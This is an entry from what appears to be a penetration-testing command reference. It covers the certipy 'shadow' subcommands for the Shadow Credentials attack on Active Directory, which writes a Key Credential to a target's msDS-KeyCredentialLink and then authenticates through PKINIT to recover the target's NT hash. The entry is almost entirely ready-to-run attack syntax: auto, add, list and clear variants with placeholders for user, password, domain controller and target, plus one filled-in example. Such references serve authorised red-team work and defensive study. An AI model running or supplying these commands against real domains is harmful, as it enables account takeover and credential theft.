Certipy Shadow Credentials (msDS-KeyCredentialLink)

Abuse GenericAll/GenericWrite/WriteProperty over a target by writing a Key Credential to msDS-KeyCredentialLink, then PKINIT-authenticate as the target to recover their NT hash. The 'auto' subcommand handles add → auth → cleanup in one shot.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy shadow auto -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -account '<target>'

Credential variants

The same attack using a different authentication material.

Manual Add requires password

certipy shadow add -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -account '<target>'

List requires password

certipy shadow list -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -account '<target>'

Clear requires password

certipy shadow clear -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -account '<target>'

Examples

certipy shadow auto -u jdoe@corp.local -p Password123! -dc-ip 10.10.10.10 -account targetuser

Tags

certipy shadow-credentials kcl pkinit genericwrite

References